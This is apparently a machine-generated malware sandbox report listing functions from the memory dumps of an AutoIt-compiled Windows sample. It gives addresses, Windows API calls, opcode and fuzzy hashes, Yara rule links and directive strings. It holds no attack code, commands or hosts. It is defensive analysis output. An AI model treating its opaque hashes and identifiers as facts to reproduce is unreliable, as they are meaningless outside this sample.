Opcode ID: 319362e0c1189f4148b2bd11b5746892fd0e5b3d44d6cda6ad39bfd0ea7b0b86
Instruction ID: c85732221d38e68f6c86fa6b42b687db7d9f6a6010be8e6b406385d50c01cfd3
Opcode Fuzzy Hash: 319362e0c1189f4148b2bd11b5746892fd0e5b3d44d6cda6ad39bfd0ea7b0b86
Instruction Fuzzy Hash: 92F0823550132DABEB11AFA4CC49FEA776CAF49361F00856AB905D6181D634D940CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0046F594, Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0046F59C
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0047F3AD,?,?,?,?), ref: 0046F5C6

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 16dde98a478d5af150936b32a8bafd222dd1f0fa22f8a304b6f6aceaf929eebc
Instruction ID: 00361bb457cf1d0dc1eaa3d890c9a635262be686b2fda1bc92fef15f8827578b
Opcode Fuzzy Hash: 16dde98a478d5af150936b32a8bafd222dd1f0fa22f8a304b6f6aceaf929eebc
Instruction Fuzzy Hash: DFE08C70104218BBEB140F09EC0AFBE3B58EB00B90F10892AF957980E1E7B488A0D768

Uniqueness

Uniqueness Score: -1.00%

Function 00428E3C, Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0040125D,00427A43,00400F35,?,?,00000001), ref: 00428E41
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00428E4A

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0b2d81347645d3b8d97edc6628d6667a1da33a1fb1092a49ae7e5ea2021829cd
Instruction ID: 04f54983d9c83d2e3b16e728467a1860dcda0a015fca0c92628999212a955fd1
Opcode Fuzzy Hash: 0b2d81347645d3b8d97edc6628d6667a1da33a1fb1092a49ae7e5ea2021829cd
Instruction Fuzzy Hash: 55B09271445B08ABEB002BA1EC09B8C3F68EB08A62F004434FA1D440A08B6354508B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00413680, Relevance: 2.5, APIs: 1, Instructions: 986COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 06e9078aab6a6be3c70de7747e3433f2bc9a3e05112eb710cc2db91be17b595e
Instruction ID: f1def256dedd080e98542732b2a69db6e5ef6012b924b3d112db4f56b8ba4d71
Opcode Fuzzy Hash: 06e9078aab6a6be3c70de7747e3433f2bc9a3e05112eb710cc2db91be17b595e
Instruction Fuzzy Hash: 2A925E706083419FD714DF19C480BABB7E1BF88308F14855EE98A8B392D779ED85CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004702AA, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00470352

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 25dfe46bdba63ffaca6ec3e148f5c83576a041738c35bea0cc6ef6b05c79c880
Instruction ID: 4d0af9fa4a1bf92a22b5c98f902a78345d275c8a36b2b09fc5026844f2c81b55
Opcode Fuzzy Hash: 25dfe46bdba63ffaca6ec3e148f5c83576a041738c35bea0cc6ef6b05c79c880
Instruction Fuzzy Hash: B711E731205215FBFB245B28CC49FFA3714E745760F24C32BFD155A2E2CA689D41D2AE

Uniqueness

Uniqueness Score: -1.00%

Function 0046FE80, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B155: GetWindowLongW.USER32(?,000000EB), ref: 0041B166

NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0047F36A,?,?,?,?,00000000,?), ref: 0046FEF8

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 379403cb43ef3c5b1bb5e4519e6b68952dabc810d6b1017c01b4738556f9a515
Instruction ID: a6ef576f00e014a486c59d073021a2a3193bdc7118d05d43368cd7834febe1b5
Opcode Fuzzy Hash: 379403cb43ef3c5b1bb5e4519e6b68952dabc810d6b1017c01b4738556f9a515
Instruction Fuzzy Hash: EE01F531A001196BDB149E18E809BEB3F52EB42364F14453BF955172B3E73A6C1497A9

Uniqueness

Uniqueness Score: -1.00%

Function 0046EA4E, Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

Part of subcall function 0041B736: GetCursorPos.USER32(000000FF), ref: 0041B749
Part of subcall function 0041B736: ScreenToClient.USER32(00000000,000000FF), ref: 0041B766
Part of subcall function 0041B736: GetAsyncKeyState.USER32(00000001), ref: 0041B78B
Part of subcall function 0041B736: GetAsyncKeyState.USER32(00000002), ref: 0041B799

NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0047F417,?,?,?,?,?,00000001,?), ref: 0046EA9C

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: abeb278cc13824d036ea4b2daf28c1fa22794c7f1fbc7ec8138d8bc8c36a30e5
Instruction ID: c08d2569dfa13d63c1a4b18acbdaf19426ee2964601fa7c829751d6bd560dd31
Opcode Fuzzy Hash: abeb278cc13824d036ea4b2daf28c1fa22794c7f1fbc7ec8138d8bc8c36a30e5
Instruction Fuzzy Hash: BBF0A735104219BBDB146F56DC05EBE3FA1FB01794F00401AF9161A1E2D77AD8B1DBE9

Uniqueness

Uniqueness Score: -1.00%

Function 0041B7F2, Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,0041AF40,?,?,?,?,?), ref: 0041B83B

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: a64cd6ccabe15f9f2b7716715993b690086e64d808db388686386d52a4f8c19e
Instruction ID: a8b2f94f11cf07534bb97e3ab6ed010fd2323c8dc8106306974f915047ed54be
Opcode Fuzzy Hash: a64cd6ccabe15f9f2b7716715993b690086e64d808db388686386d52a4f8c19e
Instruction Fuzzy Hash: E8F0B4305002099FDB14AF14DC50D763BA2F701360F50812AF812472B1D735C860DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0046F3DA, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0046F41A

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 079ced1d969b8994fdd67207d0fe2d299f6689a8f6d45232c304d42da55ff22f
Instruction ID: a6a6dbe40349e04a0b79fefdc961376d859e77ed149aa5714a4ff40177fea1a4
Opcode Fuzzy Hash: 079ced1d969b8994fdd67207d0fe2d299f6689a8f6d45232c304d42da55ff22f
Instruction Fuzzy Hash: 3DF06D31205249BFDB21EF58DC09FC63B95FB06360F14842ABA51672E2DB74A820D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0046F425, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0047F3D4,?,?,?,?,?,?), ref: 0046F450

Part of subcall function 0046E13E: _memset.LIBCMT ref: 0046E14D
Part of subcall function 0046E13E: _memset.LIBCMT ref: 0046E15C
Part of subcall function 0046E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C3EE0,004C3F24), ref: 0046E18B
Part of subcall function 0046E13E: CloseHandle.KERNEL32 ref: 0046E19D

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 2364484715-0
Opcode ID: 77bf0820fc090b631ee1892194272f1c0f48c36c24c1451fc182f9cf2a2bb2c5
Instruction ID: d5a77e4292850f939365c1ab2a7621c2144ed30840052feee0b2e65384adb966
Opcode Fuzzy Hash: 77bf0820fc090b631ee1892194272f1c0f48c36c24c1451fc182f9cf2a2bb2c5
Instruction Fuzzy Hash: 42E04631100208EFCB01EF09EC04E9A37A2FB09344F008026FA00576B2DB31ED21EF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC99, Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0041ACC7

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 3a91f52d5fb251e5c3f98c783579c1bec193ecfcd4c0514373ff3388bf01935a
Instruction ID: ef670f2e35a1e32ea4cf454927599420aff2e5ffa2f35a6f87d657bf3e0fd491
Opcode Fuzzy Hash: 3a91f52d5fb251e5c3f98c783579c1bec193ecfcd4c0514373ff3388bf01935a
Instruction Fuzzy Hash: D3E0EC35504208FBCF45AF91DC51E683B26FB49394F10842DF6054A6B2CB36E562EB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041B845, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0041AF8E

Part of subcall function 0041B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0041B85B), ref: 0041B926
Part of subcall function 0041B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0041B85B,00000000,?,?,0041AF1E,?,?), ref: 0041B9BD

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0041AF1E,?,?), ref: 0041B864

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: 3986ceadf2834ed1d5960c3191594e80f7786d2b31b37f852fa2e83cfb0f4340
Instruction ID: 24517efd7b9b3851562c19fb431ba2b635891a1753cb74db69212e55c179f1e8
Opcode Fuzzy Hash: 3986ceadf2834ed1d5960c3191594e80f7786d2b31b37f852fa2e83cfb0f4340
Instruction Fuzzy Hash: 6BD0127514430C77DB103BA2DC07F8D3B1DEB01B94F50883AF605691E28B75A461A5AD

Uniqueness

Uniqueness Score: -1.00%

Function 0046F37C, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 0046F3A1

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: d8d00dcc489d19f9bc4ae86857e6389c06f816fdcd15fac0bf256266c5fe7f13
Instruction ID: 98badeb4616f98a7e1fccd3fdaeaec4c60dcf08d64caa965bc5bb801c8a9bdb9
Opcode Fuzzy Hash: d8d00dcc489d19f9bc4ae86857e6389c06f816fdcd15fac0bf256266c5fe7f13
Instruction Fuzzy Hash: 19E0E23420420CEFCB01EF88EC44E8A3BA5FB1A350F000064FD048B262C771A820DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0046F3AB, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 0046F3D0

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: a67a8fdab054f89f94e1a12582320826c654fac588ba7aabd345155fdd1c404d
Instruction ID: b3137296b9856e8c7e58b34ba315bafdffde788975c54cadd95f83f0dd4bfddb
Opcode Fuzzy Hash: a67a8fdab054f89f94e1a12582320826c654fac588ba7aabd345155fdd1c404d
Instruction Fuzzy Hash: 63E0E23420420CEFCB01EF88E844E8A3BA5FB1A350F000064FD048B262C772A820EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 051608EE, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.261826032.0000000005160000.00000040.00000001.sdmp, Offset: 05160000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction ID: 6f54a8d7d33bc3d4b5befad8a5286b3411bf6f83c880ba0b67d3c303ccd7017c
Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction Fuzzy Hash: 8811C636A14119AFDB20DBA9D88C87DF7FEFF49690B554065E809D3210E7709E51C660

Uniqueness

Uniqueness Score: -1.00%

Function 051609DE, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.261826032.0000000005160000.00000040.00000001.sdmp, Offset: 05160000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction ID: 8d8cd2d44fe71c325bfadcc9544f0de860603a3e81bfdfcd04994ab4b5ee0433
Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
Instruction Fuzzy Hash: 8AE012397655499FC754CBA8C845D15B3F8EB0D660B154294FC15C73A1E734EE10D650

Uniqueness

Uniqueness Score: -1.00%

Function 05160A1C, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.261826032.0000000005160000.00000040.00000001.sdmp, Offset: 05160000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction ID: 1155e6021b80bc80acda9b69c3418062c50fd0096b51ebe1e2be1a342a4a28b7
Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
Instruction Fuzzy Hash: CAE0863A7125508FC320DA19C488D66F3E9FB8C2F071A4479E84AD3711D330FC10C650

Uniqueness

Uniqueness Score: -1.00%

Function 0516099F, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.261826032.0000000005160000.00000040.00000001.sdmp, Offset: 05160000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 0046D095, Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0046D0EB
GetSysColorBrush.USER32(0000000F), ref: 0046D11C
GetSysColor.USER32(0000000F), ref: 0046D128
SetBkColor.GDI32(?,000000FF), ref: 0046D142
SelectObject.GDI32(?,00000000), ref: 0046D151
InflateRect.USER32(?,000000FF,000000FF), ref: 0046D17C
GetSysColor.USER32(00000010), ref: 0046D184
CreateSolidBrush.GDI32(00000000), ref: 0046D18B
FrameRect.USER32(?,?,00000000), ref: 0046D19A
DeleteObject.GDI32(00000000), ref: 0046D1A1
InflateRect.USER32(?,000000FE,000000FE), ref: 0046D1EC
FillRect.USER32(?,?,00000000), ref: 0046D21E
GetWindowLongW.USER32(?,000000F0), ref: 0046D249

Part of subcall function 0046D385: GetSysColor.USER32(00000012), ref: 0046D3BE
Part of subcall function 0046D385: SetTextColor.GDI32(?,?), ref: 0046D3C2
Part of subcall function 0046D385: GetSysColorBrush.USER32(0000000F), ref: 0046D3D8
Part of subcall function 0046D385: GetSysColor.USER32(0000000F), ref: 0046D3E3
Part of subcall function 0046D385: GetSysColor.USER32(00000011), ref: 0046D400
Part of subcall function 0046D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0046D40E
Part of subcall function 0046D385: SelectObject.GDI32(?,00000000), ref: 0046D41F
Part of subcall function 0046D385: SetBkColor.GDI32(?,00000000), ref: 0046D428
Part of subcall function 0046D385: SelectObject.GDI32(?,?), ref: 0046D435
Part of subcall function 0046D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0046D454
Part of subcall function 0046D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0046D46B
Part of subcall function 0046D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0046D480
Part of subcall function 0046D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0046D4A8

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: 743cf32215bbfa4d01a9be1d4b4eae1e9d73dfaa6652cb5377925351bb5e3647
Instruction ID: b572dba96425da01c67dca275654e195242908bb042e55872c63487429e1e317
Opcode Fuzzy Hash: 743cf32215bbfa4d01a9be1d4b4eae1e9d73dfaa6652cb5377925351bb5e3647
Instruction Fuzzy Hash: F6917C71909301BFCB10AF64DC48E5FBBA9FF89324F100A2EF962961E0D775D9448B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C714, Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0040C741
__wcsnicmp.LIBCMT ref: 0040C759
__wcsnicmp.LIBCMT ref: 0040C771
__wcsnicmp.LIBCMT ref: 0040C789
__wcsnicmp.LIBCMT ref: 0040C7A1
__wcsnicmp.LIBCMT ref: 0040C7B5
__wcsnicmp.LIBCMT ref: 0040C7C9
__wcsnicmp.LIBCMT ref: 0040C7E1
__wcsnicmp.LIBCMT ref: 0040C8B2
__wcsnicmp.LIBCMT ref: 0040C8C6
__wcsnicmp.LIBCMT ref: 0040C8DA
__wcsnicmp.LIBCMT ref: 0040C8EE

Strings

#OnAutoItStartRegister, xrefs: 0040C783
Cannot parse #include, xrefs: 00473482
Bad directive syntax error, xrefs: 0047346D
#include, xrefs: 0040C7AF
#include-once, xrefs: 0040C79B
#pragma compile, xrefs: 0040C73B
#notrayicon, xrefs: 0040C753
#comments-end, xrefs: 0040C8D4
#comments-start, xrefs: 0040C7C3, 0040C8AC
#cs, xrefs: 0040C7DB, 0040C8C0
Unterminated group of comments, xrefs: 00473475
#ce, xrefs: 0040C8E8
#requireadmin, xrefs: 0040C76B

Memory Dump Source

Source File: 00000001.00000002.259427848.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.259420849.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.259849221.00000000004AE000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259905939.00000000004BA000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259948544.00000000004D4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.259968499.00000000004E4000.00000040.00020000.sdmp Download File
Associated: 00000001.00000002.260017756.00000000004EA000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.260035244.00000000004EC000.00000004.00020000.sdmp Download File

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: aec66712e738298caa7b80cea9b057916d77a34dc4c849947a928dd03e19aac5
Instruction ID: af7057c32edd8608fa9ab0f0d5c535b2b474081c9ae6b60262623330cb34a447
